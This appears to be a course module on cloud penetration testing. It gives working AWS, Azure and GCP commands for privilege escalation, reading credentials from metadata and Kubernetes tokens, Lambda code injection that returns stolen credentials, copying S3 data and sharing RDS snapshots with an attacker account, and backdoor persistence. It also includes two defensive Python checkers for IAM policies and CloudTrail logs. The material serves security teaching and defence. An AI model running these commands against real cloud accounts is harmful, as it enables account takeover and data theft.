Cloud Pentesting & Assessment

Cloud Exploitation Techniques


Understanding cloud-specific exploitation paths is essential for both offensive testing and defensive hardening. IAM policy abuse, privilege escalation, and lateral movement techniques differ significantly from traditional infrastructure attacks.

AWS Privilege Escalation

IAM-Based Escalation Paths

iam:PassRole + service creation:

# If you can pass roles and create Lambda
aws iam create-role --role-name EscalateRole --assume-role-policy-document file://trust.json

# Create Lambda with admin role
aws lambda create-function \
    --function-name escalate \
    --runtime python3.13 \
    --role arn:aws:iam::123456789012:role/AdminRole \
    --handler index.handler \
    --zip-file fileb://payload.zip

# The function runs with AdminRole's credentials, so whatever code is in payload.zip acts as that role

iam:CreatePolicyVersion:

# Create new policy version with admin permissions
aws iam create-policy-version \
    --policy-arn arn:aws:iam::123456789012:policy/TargetPolicy \
    --policy-document file://admin-policy.json \
    --set-as-default

iam:AttachUserPolicy / AttachRolePolicy:

# Attach AdministratorAccess
aws iam attach-user-policy \
    --user-name compromised-user \
    --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

Common Escalation Vectors

Permission                               | Escalation Path
-----------------------------------------|------------------------------------
iam:PassRole + lambda:CreateFunction     | Create Lambda with privileged role
iam:PassRole + ec2:RunInstances          | Launch EC2 with instance profile
iam:CreatePolicyVersion                  | Modify policy to add permissions
iam:AttachUserPolicy                     | Attach admin policy
iam:PutUserPolicy                        | Add inline admin policy
sts:AssumeRole                           | Assume more privileged role
lambda:UpdateFunctionCode                | Modify existing Lambda
ec2:ModifyInstanceAttribute              | Change instance userData

Automated Detection

# Pacu - AWS exploitation framework
python3 pacu.py

# Within Pacu:
> run iam__privesc_scan
> run iam__enum_permissions
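A defender-side counterpart to Pacu's privesc scan, added here as an example that is not part of the original lesson or of Pacu: it lints one IAM policy document against the action combinations from the escalation table above, so a reviewer can catch a "narrow" deployer policy that quietly pairs iam:PassRole with lambda:CreateFunction. The policy JSON is constructed; the checker ignores Deny statements, Resource and Condition constraints and NotAction, so it over-reports relative to real effective permissions and is meant as a first-pass review aid.

```python
import fnmatch
import json

# Action combinations from the escalation table above (sts:AssumeRole is left
# out because it hinges on the target role's trust policy, not this policy).
ESCALATION_PATHS = {
    "Lambda with privileged role": {"iam:PassRole", "lambda:CreateFunction"},
    "EC2 with instance profile": {"iam:PassRole", "ec2:RunInstances"},
    "Policy version rewrite": {"iam:CreatePolicyVersion"},
    "Attach managed policy to user": {"iam:AttachUserPolicy"},
    "Inline user policy": {"iam:PutUserPolicy"},
    "Modify existing Lambda code": {"lambda:UpdateFunctionCode"},
    "Change EC2 userData": {"ec2:ModifyInstanceAttribute"},
}

def allowed_actions(policy):
    """Collect Action entries from Allow statements, keeping wildcards as patterns."""
    actions = set()
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        acts = stmt.get("Action", [])
        actions.update([acts] if isinstance(acts, str) else acts)
    return actions

def grants(allowed, action):
    """True if any allowed pattern ('*', 'iam:*', 'iam:Pass*') matches the action."""
    return any(fnmatch.fnmatchcase(action.lower(), pat.lower()) for pat in allowed)

def find_escalation_paths(policy):
    """Names of escalation paths whose every required action this policy allows."""
    allowed = allowed_actions(policy)
    return [name for name, needed in ESCALATION_PATHS.items()
            if all(grants(allowed, a) for a in needed)]

# Constructed sample: a "deployer" policy that looks narrow but pairs
# iam:PassRole with lambda:CreateFunction on any resource.
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["lambda:CreateFunction", "lambda:GetFunction"], "Resource": "*"},
    {"Effect": "Allow", "Action": "iam:PassRole", "Resource": "*"},
    {"Effect": "Allow", "Action": "ec2:Describe*", "Resource": "*"}
  ]
}""")

if __name__ == "__main__":
    for path in find_escalation_paths(SAMPLE_POLICY):
        print("escalation path:", path)
```

The usual fix for the flagged sample is to scope iam:PassRole to the specific role ARN and add an iam:PassedToService condition rather than allowing it on "*".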

Azure Privilege Escalation

Role Assignment Abuse

# If you have Owner or User Access Administrator
az role assignment create \
    --assignee user@domain.com \
    --role "Owner" \
    --scope /subscriptions/SUBSCRIPTION_ID

Service Principal Exploitation

# Create service principal with privileged access
az ad sp create-for-rbac \
    --name "attacker-sp" \
    --role Contributor \
    --scopes /subscriptions/SUBSCRIPTION_ID

# Use returned credentials
az login --service-principal \
    -u APP_ID \
    -p PASSWORD \
    --tenant TENANT_ID

Managed Identity Abuse

# From compromised VM/App Service with managed identity
# Get an access token from the Azure Instance Metadata Service
TOKEN=$(curl -s -H "Metadata: true" \
    "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" \
    | jq -r '.access_token')

# Use token for ARM API calls
curl -H "Authorization: Bearer $TOKEN" \
    "https://management.azure.com/subscriptions?api-version=2020-01-01"

Azure AD Escalation

Privilege                          | Escalation
-----------------------------------|--------------------------------------------
Application.ReadWrite.All          | Create app with privileged API permissions
RoleManagement.ReadWrite.Directory | Assign Global Admin
User.ReadWrite.All                 | Modify user attributes
Group.ReadWrite.All                | Add self to privileged groups

GCP Privilege Escalation

Service Account Key Creation

# If you have iam.serviceAccountKeys.create
gcloud iam service-accounts keys create key.json \
    --iam-account admin-sa@project.iam.gserviceaccount.com

# Authenticate as service account
gcloud auth activate-service-account --key-file=key.json

setIamPolicy Abuse

# If you have setIamPolicy on project
gcloud projects set-iam-policy PROJECT_ID policy.json

# policy.json grants owner to attacker
{
  "bindings": [{
    "role": "roles/owner",
    "members": ["user:attacker@gmail.com"]
  }]
}

Impersonation

# If you can impersonate service accounts
gcloud auth print-access-token \
    --impersonate-service-account=admin@project.iam.gserviceaccount.com

Lateral Movement

AWS Cross-Account Access

# Enumerate assumable roles
aws iam list-roles \
    --query 'Roles[*].[RoleName,AssumeRolePolicyDocument]'

# Assume cross-account role
aws sts assume-role \
    --role-arn arn:aws:iam::TARGET_ACCOUNT:role/TrustedRole \
    --role-session-name lateral-movement

# Use new credentials
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...

Lambda Function Code Injection

# Modify existing Lambda function
cat > payload.py << 'EOF'
import boto3
import os

def handler(event, context):
    client = boto3.client('sts')
    creds = client.assume_role(
        RoleArn=os.environ['TARGET_ROLE'],
        RoleSessionName='injected'
    )
    # Exfiltrate credentials
    return creds['Credentials']
EOF

zip payload.zip payload.py
aws lambda update-function-code \
    --function-name target-function \
    --zip-file fileb://payload.zip

Kubernetes Service Account Token

# From compromised pod: read the mounted service account token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# Use token to access API
kubectl --token=$TOKEN --server=https://kubernetes.default auth can-i --list
kubectl --token=$TOKEN --server=https://kubernetes.default get secrets -A

Data Exfiltration

S3 Bucket Exfiltration

# Copy entire bucket
aws s3 sync s3://target-bucket ./exfil/

# If bucket is public
aws s3 cp s3://target-bucket/sensitive.db ./exfil/ --no-sign-request

Database Snapshot Sharing

# Share RDS snapshot with attacker account
aws rds modify-db-snapshot-attribute \
    --db-snapshot-identifier target-snapshot \
    --attribute-name restore \
    --values-to-add ATTACKER_ACCOUNT_ID

# In attacker account, restore snapshot
aws rds restore-db-instance-from-db-snapshot \
    --db-instance-identifier stolen-db \
    --db-snapshot-identifier arn:aws:rds:region:VICTIM:snapshot:target-snapshot

Persistence Techniques

IAM User/Access Key Creation

# Create backdoor user
aws iam create-user --user-name service-automation

# Create access keys
aws iam create-access-key --user-name service-automation

# Attach permissions
aws iam attach-user-policy \
    --user-name service-automation \
    --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

Lambda Backdoor

# Create persistent Lambda triggered by CloudWatch Events
aws events put-rule \
    --name backdoor-trigger \
    --schedule-expression "rate(1 day)"

aws lambda add-permission \
    --function-name backdoor \
    --statement-id events \
    --action lambda:InvokeFunction \
    --principal events.amazonaws.com

aws events put-targets \
    --rule backdoor-trigger \
    --targets "Id"="1","Arn"="arn:aws:lambda:region:account:function:backdoor"

Exploitation Checklist

Phase    | AWS                          | Azure                             | GCP
---------|------------------------------|-----------------------------------|---------------------
Priv Esc | PassRole, CreatePolicyVersion | Role assignments, Managed Identity | setIamPolicy, SA keys
Lateral  | AssumeRole, Lambda injection | Service principals                | Impersonation
Persist  | IAM users, Lambda            | App registration                  | SA keys
Exfil    | S3 sync, snapshot share      | Blob download                     | gsutil
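The AWS column of the checklist maps almost one-to-one onto CloudTrail management events, so the detection side can be expressed as a handful of rules over those records. The rules below are an added example, not part of the original lesson, run over constructed CloudTrail-style records trimmed to the fields the rules read; the requestParameters key names assume CloudTrail's usual camelCasing of API parameters (for example dBSnapshotIdentifier), and a real deployment would baseline CreatePolicyVersion and CreateAccessKey by principal, since CI roles issue them routinely.

```python
import json
from typing import Optional

# Constructed CloudTrail-style records, one per line, trimmed to the fields the
# rules read; field names assume CloudTrail's camelCasing of API parameters.
SAMPLE_EVENTS = """\
{"eventSource":"iam.amazonaws.com","eventName":"CreatePolicyVersion","recipientAccountId":"111111111111","requestParameters":{"policyArn":"arn:aws:iam::111111111111:policy/TargetPolicy","setAsDefault":true}}
{"eventSource":"iam.amazonaws.com","eventName":"AttachUserPolicy","recipientAccountId":"111111111111","requestParameters":{"userName":"compromised-user","policyArn":"arn:aws:iam::aws:policy/AdministratorAccess"}}
{"eventSource":"rds.amazonaws.com","eventName":"ModifyDBSnapshotAttribute","recipientAccountId":"111111111111","requestParameters":{"dBSnapshotIdentifier":"target-snapshot","attributeName":"restore","valuesToAdd":["222222222222"]}}
{"eventSource":"lambda.amazonaws.com","eventName":"UpdateFunctionCode20150331v2","recipientAccountId":"111111111111","requestParameters":{"functionName":"target-function"}}
{"eventSource":"ec2.amazonaws.com","eventName":"DescribeInstances","recipientAccountId":"111111111111","requestParameters":{}}
"""

def classify(event) -> Optional[str]:
    """Map one record to a finding label, or None when no rule matches."""
    name = event.get("eventName", "")
    params = event.get("requestParameters") or {}
    account = event.get("recipientAccountId")
    if name == "CreatePolicyVersion" and params.get("setAsDefault"):
        return "privesc: managed policy rewritten and set as default"
    if name in ("AttachUserPolicy", "AttachRolePolicy", "AttachGroupPolicy") \
            and params.get("policyArn", "").endswith("/AdministratorAccess"):
        return "privesc: AdministratorAccess attached"
    if name in ("PutUserPolicy", "PutRolePolicy", "PutGroupPolicy"):
        return "privesc: inline policy added"
    if name.startswith("UpdateFunctionCode"):  # Lambda event names carry an API-version suffix
        return "lateral: existing Lambda code replaced"
    if name == "ModifyDBSnapshotAttribute" and params.get("attributeName") == "restore":
        foreign = [a for a in params.get("valuesToAdd", []) if a != account]
        if foreign:  # "all" (public) also lands here since it never equals the account id
            return "exfil: RDS snapshot shared with external account " + ",".join(foreign)
    if name in ("CreateUser", "CreateAccessKey"):
        return "persist: new IAM credential for " + str(params.get("userName"))
    return None

def detect(events_text):
    """Run every rule over newline-delimited JSON records; returns (eventName, label) pairs."""
    findings = []
    for line in events_text.splitlines():
        if line.strip():
            event = json.loads(line)
            label = classify(event)
            if label:
                findings.append((event["eventName"], label))
    return findings

if __name__ == "__main__":
    for name, label in detect(SAMPLE_EVENTS):
        print(f"{name:32} {label}")
```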

Next, we'll explore cloud security assessment tools and frameworks.

Module 6: Cloud Pentesting & Assessment